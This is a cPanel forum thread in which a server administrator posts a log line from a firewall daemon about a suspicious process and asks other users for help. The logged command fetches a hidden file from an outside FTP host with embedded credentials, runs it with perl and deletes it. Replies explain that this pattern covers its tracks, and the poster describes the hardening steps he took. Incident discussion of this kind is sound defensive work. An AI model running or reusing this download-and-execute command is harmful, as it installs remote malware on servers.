The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Strange "Suspicious Process" in the configserv logs

Discussion in 'Security' started by Douglas Taylor, Mar 4, 2013.

  1. Douglas Taylor

    Joined:
    Oct 18, 2011
    Messages:
    9
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    United States
    cPanel Access Level:
    Root Administrator
    Code:
    Mar 4 20:09:42 ip-72-167-47-182 lfd[28771]: *Suspicious Process* PID:25132 PPID:25129 User:nobody Uptime:93156 secs EXE:/bin/bash CMD:sh -c cd /tmp;wget ftp://muske:ted7862ted@85.214.65.162/.za.exe;curl -O ftp://muske:ted7862ted@85.214.65.162/.za.exe;perl .za.exe;rm -rf .za
    
    I have literally no idea who or what this is. Pointers? Thanks!
     
  2. Zepplin

    Zepplin Well-Known Member

    Joined:
    Oct 23, 2006
    Messages:
    93
    Likes Received:
    1
    Trophy Points:
    8
    Location:
    Blue Mountains, Australia
    cPanel Access Level:
    Root Administrator
  3. quietFinn

    quietFinn Well-Known Member

    Joined:
    Feb 4, 2006
    Messages:
    998
    Likes Received:
    10
    Trophy Points:
    18
    Location:
    Finland
    cPanel Access Level:
    Root Administrator
    Actually they are trying to download it, then execute it, and after that delete it, so there is nothing left to find :(
     
  4. Douglas Taylor

    Joined:
    Oct 18, 2011
    Messages:
    9
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    United States
    cPanel Access Level:
    Root Administrator
    I chmod 700 wget and turning on mod_security in Apache and we'll see if that helps any.
     
Loading...

Share This Page